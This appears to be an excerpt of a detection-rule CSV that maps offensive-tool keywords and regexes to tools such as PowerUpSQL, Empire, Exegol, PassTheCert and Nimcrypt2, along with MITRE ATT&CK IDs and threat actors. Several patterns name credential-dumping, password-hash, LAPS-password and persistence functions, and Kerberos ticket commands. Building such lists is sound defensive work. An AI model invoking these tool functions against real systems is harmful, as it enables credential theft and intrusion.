"*Get-SQLC2Query*",".{0,1000}Get\-SQLC2Query.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46250"
"*Get-SQLC2Result*",".{0,1000}Get\-SQLC2Result.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46251"
"*Get-SQLDomainPasswordsLAPS*",".{0,1000}Get\-SQLDomainPasswordsLAPS.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46252"
"*Get-SQLFuzzDatabaseName*",".{0,1000}Get\-SQLFuzzDatabaseName.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46253"
"*Get-SQLFuzzDomainAccount*",".{0,1000}Get\-SQLFuzzDomainAccount.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46254"
"*Get-SQLFuzzObjectName*",".{0,1000}Get\-SQLFuzzObjectName.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46255"
"*Get-SQLFuzzServerLogin'*",".{0,1000}Get\-SQLFuzzServerLogin\'.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46256"
"*Get-SQLInstanceDomain*",".{0,1000}Get\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Get-SQLInstanceDomain.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46257"
"*Get-SQLInstanceDomain.ps1*",".{0,1000}Get\-SQLInstanceDomain\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1082","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46258"
"*Get-SQLLocalAdminCheck*",".{0,1000}Get\-SQLLocalAdminCheck.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46259"
"*Get-SQLOleDbProvder*",".{0,1000}Get\-SQLOleDbProvder.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46260"
"*Get-SQLPersistRegDebugger*",".{0,1000}Get\-SQLPersistRegDebugger.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46261"
"*Get-SQLPersistRegRun*",".{0,1000}Get\-SQLPersistRegRun.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46262"
"*Get-SQLPersistTriggerDDL*",".{0,1000}Get\-SQLPersistTriggerDDL.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46263"
"*Get-SQLQuery.ps1*",".{0,1000}Get\-SQLQuery\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","46264"
"*Get-SQLRecoverPwAutoLogon*",".{0,1000}Get\-SQLRecoverPwAutoLogon.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46265"
"*Get-SQLServerCredential*",".{0,1000}Get\-SQLServerCredential.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46266"
"*Get-SqlServerLinkCrawl*",".{0,1000}Get\-SqlServerLinkCrawl.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Automatically find all linked databases","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","46267"
"*Get-SQLServerLinkCrawl*",".{0,1000}Get\-SQLServerLinkCrawl.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46268"
"*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLServerLoginDefaultPw.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46269"
"*Get-SQLServerLoginDefaultPw*",".{0,1000}Get\-SQLServerLoginDefaultPw.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46270"
"*Get-SQLServerPasswordHash*",".{0,1000}Get\-SQLServerPasswordHash.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46271"
"*Get-SQLServerPriv*",".{0,1000}Get\-SQLServerPriv.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46272"
"*Get-SQLServiceAccount*",".{0,1000}Get\-SQLServiceAccount.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46273"
"*Get-SQLServiceAccountPwHashes*",".{0,1000}Get\-SQLServiceAccountPwHashes.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46274"
"*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Get-SQLServerLoginDefaultPw.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","46275"
"*Get-SQLSysadminCheck*",".{0,1000}Get\-SQLSysadminCheck.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46276"
"*Get-SQLTriggerDdl*",".{0,1000}Get\-SQLTriggerDdl.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46277"
"*Get-SQLTriggerDml*",".{0,1000}Get\-SQLTriggerDml.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","1","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","46278"
"*getST.py * -spn *",".{0,1000}getST\.py\s.{0,1000}\s\-spn\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46279"
"*getST.py -k -no-pass -spn*",".{0,1000}getST\.py\s\-k\s\-no\-pass\s\-spn.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","46280"
"*getST.py -spn *",".{0,1000}getST\.py\s\-spn\s.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","0","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","46281"
"*GetSyscallStub.nim*",".{0,1000}GetSyscallStub\.nim.{0,1000}","offensive_tool_keyword","Nimcrypt2",".NET PE & Raw Shellcode Packer/Loader Written in Nim","T1027 - T1202 - T1059.005 - T1105 - T1045","TA0005 - TA0011 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/icyguider/Nimcrypt2","1","1","N/A","N/A","N/A","8","771","124","2023-01-20T22:07:15Z","2022-02-23T15:43:16Z","46283"
